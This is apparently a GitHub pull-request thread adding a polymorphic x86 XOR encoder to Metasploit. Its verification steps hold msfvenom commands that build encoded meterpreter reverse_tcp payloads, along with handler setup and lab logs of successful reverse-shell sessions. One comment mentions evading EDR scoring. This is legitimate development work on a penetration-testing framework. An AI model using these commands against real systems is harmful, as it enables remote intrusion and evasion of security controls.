Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean

[araout42]

Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean

it has 100% polymorphism, all the bytes changes from a generation to another

probably should be ranked as excellent since it has many many permutations for badchars

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/multi/handler
• set lhost 127.0.0.1
• set payload linux/x86/meterpreter/reverse_tcp
• exploit expected : Started listener ...
• Run ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90" > /tmp/Test && chmod +x /tmp/Test
• /tmp/test expected Connect to listener and give meterpreter session as in the video

2022-12-20.16-13-46.mov

[gwillcox-r7]

Updated PR description to make things easier to read.

[sempervictus]

This is neat stuff, thank you. Any chance of an x64 version for parity (and utility, not a lot of x86 targets around anymore and WOW64 tends to "count toward badness score" by EDR from what i've seen)? 😄

[araout42]

Hey @sempervictus i'm really glad you appreciate it !
Yes I can make a x64 version with no problem,
I think exactly the same code would work for x64
I'm not sure though as I haven't done testing about this
I will test/dev for an x64 when my work give me a little bit of time
Thanks

[araout42]

After some testing, the same code cannot be used for x64, since it need a little bit of tweaking with instructions size and the register permutations.
I will do a separate almost identical code for x64 version that i will most likely commit in another pr since it will be another modules

[sempervictus]

@araout42 - thank you sir, encoders are long-lived tools in the satchel so the more working ones we have, the merrier.

[bwatters-r7]

Hi there, @araout42; this looks great.
There's at least one super minor thing I'd like to ask you to change, but the first thing I want to do is get this working, and I cannot seem to be able to do it.

In your verification steps, you invoke this with -e x86/xor which fails for me as an invalid encoder. I'm guessing you changed the name at some point to x86/xor_poly, which I completely agree with to help differentiate it, so when I invoke it with x86/xor_poly, it does seem to use the right encoder, but still fails to find the right nop permutation, I believe:

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=44, char=0x58)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -i 20 -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=47, char=0x58)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -e x86/xor_poly -i 200 -b "\x00\x90\x58\x59"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 200 iterations of x86/xor_poly
x86/xor_poly failed with Encoding failed due to a bad character (index=49, char=0x59)
Error: No Encoder Succeeded
[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ md5sum modules/encoders/x86/xor_poly.rb 
1caea537f769f4471259e21192b8039a  modules/encoders/x86/xor_poly.rb

Please let me know if I'm missing something?

[araout42]

First, You are right, i did change the name from xor to xor_poly after a recomendation i recieved (I edited my first message now to reflect this change in the verification step )

The second is that it cannot find a proper permutation without badchar 0x58 ; 0x59
the reason to that is because i added the preserve register functionnality afterward and it require the opcodes 0x58 0x59

pop eax -> 0x58

the error message is given by the encoder and says that no permutation has been found with this badchar set

so it is working properly

But I can implement another polymorphism routine to be able to handle these badchars aswell ^^

As of now i also changed my first message using only the opcodes 0x00 ; 0x90 so the encoding can be done properly

[bwatters-r7]

Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example did not work worked properly in an unanticipated way.

[araout42]

Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example did not work worked properly in an unanticipated way.

No problem and thank you

Well i'd be happy to implement this minor change you'v mentionned earlyer :)

[bwatters-r7]

It was a minor thing I noticed, but I wanted to get everything working and do a deeper dive to make sure that there was nothing else I saw. I don't want to keep asking you to change things, so I'll try and get all the requested changes to you all at once. We appreciate your time and don't want to waste it!

[bwatters-r7]

Creating payload

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -i 20 -b "\x00\x90" -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 403 (iteration=0)
x86/xor_poly succeeded with size 453 (iteration=1)
x86/xor_poly succeeded with size 505 (iteration=2)
x86/xor_poly succeeded with size 557 (iteration=3)
x86/xor_poly succeeded with size 609 (iteration=4)
x86/xor_poly succeeded with size 659 (iteration=5)
x86/xor_poly succeeded with size 709 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 808 (iteration=8)
x86/xor_poly succeeded with size 856 (iteration=9)
x86/xor_poly succeeded with size 904 (iteration=10)
x86/xor_poly succeeded with size 953 (iteration=11)
x86/xor_poly succeeded with size 1003 (iteration=12)
x86/xor_poly succeeded with size 1054 (iteration=13)
x86/xor_poly succeeded with size 1105 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1203 (iteration=16)
x86/xor_poly succeeded with size 1251 (iteration=17)
x86/xor_poly succeeded with size 1301 (iteration=18)
x86/xor_poly succeeded with size 1353 (iteration=19)
x86/xor_poly chosen with final size 1353
Payload size: 1353 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

Getting callback

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(multi/handler) > set lport 4585
lport => 4585
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.191
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.191:50164) at 2023-03-01 13:47:44 -0600

meterpreter > sysinfo
Computer        : WIN10X86-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[bwatters-r7]

Quick and dirty testing....

The raw unencoded payload has nulls and nops

The encoded version also has nulls and nops

Encoded version with bad chars flagged does not contain the bad chars

[bwatters-r7]

So it turns out the minor thing I was going to have you fix was actually right, and I just misread it. Another reason to make sure I get it working before I suggest a fix 😆.
The only thing I see is this minor typo.

[araout42]

Thank you, well it seems perfect
I will read all the code tomorrow or the day after
And I also have few other modification to do in the comments, I am not sure if we keep the comments in the code

[bwatters-r7]

I would definitely leave the comments, especially with something this complex.

[araout42]

Well I've reread everything, and made slight changes with the comments.
So everything is Ok on my side

[bwatters-r7]

Create payload

[ruby-3.0.2](land-17401) tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.5.135.201 LPORT=4585 -f exe -e x86/xor_poly -b "\x00\x90" -i 20 -o revtcpx86_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/xor_poly
x86/xor_poly succeeded with size 405 (iteration=0)
x86/xor_poly succeeded with size 458 (iteration=1)
x86/xor_poly succeeded with size 509 (iteration=2)
x86/xor_poly succeeded with size 561 (iteration=3)
x86/xor_poly succeeded with size 612 (iteration=4)
x86/xor_poly succeeded with size 661 (iteration=5)
x86/xor_poly succeeded with size 711 (iteration=6)
x86/xor_poly succeeded with size 759 (iteration=7)
x86/xor_poly succeeded with size 809 (iteration=8)
x86/xor_poly succeeded with size 860 (iteration=9)
x86/xor_poly succeeded with size 907 (iteration=10)
x86/xor_poly succeeded with size 955 (iteration=11)
x86/xor_poly succeeded with size 1005 (iteration=12)
x86/xor_poly succeeded with size 1057 (iteration=13)
x86/xor_poly succeeded with size 1108 (iteration=14)
x86/xor_poly succeeded with size 1156 (iteration=15)
x86/xor_poly succeeded with size 1204 (iteration=16)
x86/xor_poly succeeded with size 1253 (iteration=17)
x86/xor_poly succeeded with size 1303 (iteration=18)
x86/xor_poly succeeded with size 1352 (iteration=19)
x86/xor_poly chosen with final size 1352
Payload size: 1352 bytes
Final size of exe file: 73802 bytes
Saved as: revtcpx86_xor.exe

Collect Shell:

msf6 exploit(multi/handler) > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(windows/meterpreter/reverse_tcp) > set lport 4585
lport => 4585
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

msf6 payload(windows/meterpreter/reverse_tcp) > [*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Sending stage (175686 bytes) to 10.5.134.199
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.199:49875) at 2023-03-20 17:43:51 -0500

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X86_1803
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

[bwatters-r7]

Release Notes

This PR adds a new x86 XOR polymorphic encoder.